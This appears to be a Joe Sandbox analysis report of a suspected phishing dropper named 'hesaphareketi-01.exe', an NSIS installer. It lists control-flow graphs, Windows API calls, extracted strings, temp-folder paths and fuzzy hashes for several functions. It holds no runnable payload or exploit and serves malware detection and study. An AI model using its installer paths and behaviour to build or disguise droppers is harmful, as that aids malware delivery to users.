                                                                                      control_flow_graph 190 403d3e-403d50 191 403e91-403ea0 190->191 192 403d56-403d5c 190->192 193 403ea2-403eea GetDlgItem * 2 call 404217 SetClassLongW call 40140b 191->193 194 403eef-403f04 191->194 192->191 195 403d62-403d6b 192->195 193->194 199 403f44-403f49 call 404263 194->199 200 403f06-403f09 194->200 196 403d80-403d83 195->196 197 403d6d-403d7a SetWindowPos 195->197 201 403d85-403d97 ShowWindow 196->201 202 403d9d-403da3 196->202 197->196 212 403f4e-403f69 199->212 204 403f0b-403f16 call 401389 200->204 205 403f3c-403f3e 200->205 201->202 207 403da5-403dba DestroyWindow 202->207 208 403dbf-403dc2 202->208 204->205 227 403f18-403f37 SendMessageW 204->227 205->199 211 4041e4 205->211 215 4041c1-4041c7 207->215 218 403dc4-403dd0 SetWindowLongW 208->218 219 403dd5-403ddb 208->219 217 4041e6-4041ed 211->217 213 403f72-403f78 212->213 214 403f6b-403f6d call 40140b 212->214 223 4041a2-4041bb DestroyWindow EndDialog 213->223 224 403f7e-403f89 213->224 214->213 215->211 222 4041c9-4041cf 215->222 218->217 225 403de1-403df2 GetDlgItem 219->225 226 403e7e-403e8c call 40427e 219->226 222->211 228 4041d1-4041da ShowWindow 222->228 223->215 224->223 229 403f8f-403fdc call 4062a4 call 404217 * 3 GetDlgItem 224->229 230 403e11-403e14 225->230 231 403df4-403e0b SendMessageW IsWindowEnabled 225->231 226->217 227->217 228->211 260 403fe6-404022 ShowWindow KiUserCallbackDispatcher call 404239 EnableWindow 229->260 261 403fde-403fe3 229->261 234 403e16-403e17 230->234 235 403e19-403e1c 230->235 231->211 231->230 238 403e47-403e4c call 4041f0 234->238 239 403e2a-403e2f 235->239 240 403e1e-403e24 235->240 238->226 241 403e31-403e37 239->241 242 403e65-403e78 SendMessageW 239->242 240->242 245 403e26-403e28 240->245 246 403e39-403e3f call 40140b 241->246 247 403e4e-403e57 call 40140b 241->247 242->226 245->238 256 403e45 246->256 247->226 257 403e59-403e63 247->257 256->238 257->256 264 404024-404025 260->264 265 404027 260->265 261->260 266 404029-404057 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404059-40406a SendMessageW 266->267 268 40406c 266->268 269 404072-4040b1 call 40424c call 403d1f call 406282 lstrlenW call 4062a4 SetWindowTextW call 401389 267->269 268->269 269->212 280 4040b7-4040b9 269->280 280->212 281 4040bf-4040c3 280->281 282 4040e2-4040f6 DestroyWindow 281->282 283 4040c5-4040cb 281->283 282->215 285 4040fc-404129 CreateDialogParamW 282->285 283->211 284 4040d1-4040d7 283->284 284->212 286 4040dd 284->286 285->215 287 40412f-404186 call 404217 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 404188-40419b ShowWindow call 404263 287->292 294 4041a0 292->294 294->215
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                                                      • ShowWindow.USER32(?), ref: 00403D97
                                                                                      • DestroyWindow.USER32 ref: 00403DAB
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                                                      • EnableWindow.USER32(?,?), ref: 0040401A
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00404037
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                                                      • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                                                      • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3282139019-0
                                                                                      • Opcode ID: e1db8d192186585ff235057a04b2e8ab0b27ba576f51f22eac3cb3cf97519198
                                                                                      • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                                                      • Opcode Fuzzy Hash: e1db8d192186585ff235057a04b2e8ab0b27ba576f51f22eac3cb3cf97519198
                                                                                      • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403990 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 295 403990-4039a8 call 40665c 298 4039aa-4039ba call 4061c9 295->298 299 4039bc-4039f3 call 406150 295->299 308 403a16-403a3f call 403c66 call 405c5b 298->308 304 4039f5-403a06 call 406150 299->304 305 403a0b-403a11 lstrcatW 299->305 304->305 305->308 313 403ad1-403ad9 call 405c5b 308->313 314 403a45-403a4a 308->314 320 403ae7-403b0c LoadImageW 313->320 321 403adb-403ae2 call 4062a4 313->321 314->313 315 403a50-403a6a call 406150 314->315 319 403a6f-403a78 315->319 319->313 322 403a7a-403a7e 319->322 324 403b8d-403b95 call 40140b 320->324 325 403b0e-403b3e RegisterClassW 320->325 321->320 326 403a90-403a9c lstrlenW 322->326 327 403a80-403a8d call 405b80 322->327 339 403b97-403b9a 324->339 340 403b9f-403baa call 403c66 324->340 328 403b44-403b88 SystemParametersInfoW CreateWindowExW 325->328 329 403c5c 325->329 333 403ac4-403acc call 405b53 call 406282 326->333 334 403a9e-403aac lstrcmpiW 326->334 327->326 328->324 332 403c5e-403c65 329->332 333->313 334->333 338 403aae-403ab8 GetFileAttributesW 334->338 343 403aba-403abc 338->343 344 403abe-403abf call 405b9f 338->344 339->332 348 403bb0-403bca ShowWindow call 4065ec 340->348 349 403c33-403c34 call 4053b9 340->349 343->333 343->344 344->333 356 403bd6-403be8 GetClassInfoW 348->356 357 403bcc-403bd1 call 4065ec 348->357 352 403c39-403c3b 349->352 354 403c55-403c57 call 40140b 352->354 355 403c3d-403c43 352->355 354->329 355->339 358 403c49-403c50 call 40140b 355->358 361 403c00-403c23 DialogBoxParamW call 40140b 356->361 362 403bea-403bfa GetClassInfoW RegisterClassW 356->362 357->356 358->339 366 403c28-403c31 call 4038e0 361->366 362->361 366->332
                                                                                      APIs
                                                                                        • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                                        • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                                      • lstrcatW.KERNEL32(1033,0042D248), ref: 00403A11
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Undige,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Undige,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Undige), ref: 00403AF8
                                                                                        • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                                      • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                                                      • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\hesaphareketi-01.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Undige$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                      • API String ID: 1975747703-541698870
                                                                                      • Opcode ID: e7c00f06e4642f31e1c1efb09d561718b89698738e495d8fe895af3e5180c348
                                                                                      • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                                                      • Opcode Fuzzy Hash: e7c00f06e4642f31e1c1efb09d561718b89698738e495d8fe895af3e5180c348
                                                                                      • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d74 372 402f11-402f16 369->372 373 402f1b-402f49 call 406282 call 405b9f call 406282 GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 403315 384->387 386->387 395 4030a0-4030a8 call 402e5d 387->395 396 402f7e-402f85 387->396 391 40304b-403063 call 40332b call 403315 388->391 392 40306d-403097 GlobalAlloc call 40332b call 4030fa 388->392 389->374 391->389 417 403065-40306b 391->417 392->389 415 4030aa-4030bb 392->415 395->389 400 403001-403005 396->400 401 402f87-402f9b call 405d2f 396->401 405 403007-40300e call 402e5d 400->405 406 40300f-403015 400->406 401->406 420 402f9d-402fa4 401->420 405->406 412 403024-40302e 406->412 413 403017-403021 call 40674f 406->413 412->384 416 403034 412->416 413->412 422 4030c3-4030c8 415->422 423 4030bd 415->423 416->381 417->389 417->392 420->406 421 402fa6-402fad 420->421 421->406 425 402faf-402fb6 421->425 426 4030c9-4030cf 422->426 423->422 425->406 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405d2f 426->428 427->406 429 402fc1-402fe1 427->429 432 4030f1 428->432 429->389 431 402fe7-402feb 429->431 433 402ff3-402ffb 431->433 434 402fed-402ff1 431->434 432->374 433->406 435 402ffd-402fff 433->435 434->416 434->433 435->406
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402ED2
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\hesaphareketi-01.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                                        • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\hesaphareketi-01.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                                        • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hesaphareketi-01.exe,C:\Users\user\Desktop\hesaphareketi-01.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\hesaphareketi-01.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\hesaphareketi-01.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 4283519449-3246505101
                                                                                      • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                                                      • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                                                      • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                                                      • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004062A4 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 209stringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 436 4062a4-4062af 437 4062b1-4062c0 436->437 438 4062c2-4062d8 436->438 437->438 439 4064f0-4064f6 438->439 440 4062de-4062eb 438->440 441 4064fc-406507 439->441 442 4062fd-40630a 439->442 440->439 443 4062f1-4062f8 440->443 444 406512-406513 441->444 445 406509-40650d call 406282 441->445 442->441 446 406310-40631c 442->446 443->439 445->444 448 406322-406360 446->448 449 4064dd 446->449 450 406480-406484 448->450 451 406366-406371 448->451 452 4064eb-4064ee 449->452 453 4064df-4064e9 449->453 454 406486-40648c 450->454 455 4064b7-4064bb 450->455 456 406373-406378 451->456 457 40638a 451->457 452->439 453->439 458 40649c-4064a8 call 406282 454->458 459 40648e-40649a call 4061c9 454->459 461 4064ca-4064db lstrlenW 455->461 462 4064bd-4064c5 call 4062a4 455->462 456->457 463 40637a-40637d 456->463 460 406391-406398 457->460 474 4064ad-4064b3 458->474 459->474 466 40639a-40639c 460->466 467 40639d-40639f 460->467 461->439 462->461 463->457 464 40637f-406382 463->464 464->457 470 406384-406388 464->470 466->467 472 4063a1-4063bf call 406150 467->472 473 4063da-4063dd 467->473 470->460 479 4063c4-4063c8 472->479 477 4063ed-4063f0 473->477 478 4063df-4063eb GetSystemDirectoryW 473->478 474->461 476 4064b5 474->476 480 406478-40647e call 406516 476->480 482 4063f2-406400 GetWindowsDirectoryW 477->482 483 40645b-40645d 477->483 481 40645f-406463 478->481 484 406468-40646b 479->484 485 4063ce-4063d5 call 4062a4 479->485 480->461 481->480 487 406465 481->487 482->483 483->481 486 406402-40640c 483->486 484->480 492 40646d-406473 lstrcatW 484->492 485->481 489 406426-40643c SHGetSpecialFolderLocation 486->489 490 40640e-406411 486->490 487->484 495 406457 489->495 496 40643e-406455 SHGetPathFromIDListW CoTaskMemFree 489->496 490->489 494 406413-40641a 490->494 492->480 498 406422-406424 494->498 495->483 496->481 496->495 498->481 498->489
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000), ref: 004063F8
                                                                                      • SHGetSpecialFolderLocation.SHELL32(0040531D,0041C000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000), ref: 00406434
                                                                                      • SHGetPathFromIDListW.SHELL32(0041C000,Call), ref: 00406442
                                                                                      • CoTaskMemFree.OLE32(0041C000), ref: 0040644D
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000), ref: 004064CB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                      • String ID: ,Dw$Call$Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 717251189-1621803492
                                                                                      • Opcode ID: 6fc0e9bd201598ebd8c406b108823dc70aeda339606061988c7aa7d82e3f103b
                                                                                      • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                                                      • Opcode Fuzzy Hash: 6fc0e9bd201598ebd8c406b108823dc70aeda339606061988c7aa7d82e3f103b
                                                                                      • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 763 40176f-401794 call 402c37 call 405bca 768 401796-40179c call 406282 763->768 769 40179e-4017b0 call 406282 call 405b53 lstrcatW 763->769 775 4017b5-4017b6 call 406516 768->775 769->775 778 4017bb-4017bf 775->778 779 4017c1-4017cb call 4065c5 778->779 780 4017f2-4017f5 778->780 788 4017dd-4017ef 779->788 789 4017cd-4017db CompareFileTime 779->789 782 4017f7-4017f8 call 405d4f 780->782 783 4017fd-401819 call 405d74 780->783 782->783 790 40181b-40181e 783->790 791 40188d-4018b6 call 4052e6 call 4030fa 783->791 788->780 789->788 792 401820-40185e call 406282 * 2 call 4062a4 call 406282 call 4058e4 790->792 793 40186f-401879 call 4052e6 790->793 805 4018b8-4018bc 791->805 806 4018be-4018ca SetFileTime 791->806 792->778 826 401864-401865 792->826 803 401882-401888 793->803 807 402ac8 803->807 805->806 809 4018d0-4018db CloseHandle 805->809 806->809 811 402aca-402ace 807->811 812 4018e1-4018e4 809->812 813 402abf-402ac2 809->813 815 4018e6-4018f7 call 4062a4 lstrcatW 812->815 816 4018f9-4018fc call 4062a4 812->816 813->807 821 401901-4022f6 call 4058e4 815->821 816->821 821->811 826->803 828 401867-401868 826->828 828->793
                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically,?,?,00000031), ref: 004017D5
                                                                                        • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,Cellulipetally Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                                        • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000,0041C000,753823A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                        • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000,0041C000,753823A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                        • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,0040325E), ref: 00405341
                                                                                        • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll), ref: 00405353
                                                                                        • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                        • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                        • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically$C:\Users\user\AppData\Local\Temp\nsj313A.tmp$C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll$Call
                                                                                      • API String ID: 1941528284-1781081301
                                                                                      • Opcode ID: 93a8df93a63015aabafb06028bce74f043f93929368c43c52b14b4ab0043bee3
                                                                                      • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                                                      • Opcode Fuzzy Hash: 93a8df93a63015aabafb06028bce74f043f93929368c43c52b14b4ab0043bee3
                                                                                      • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004052E6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
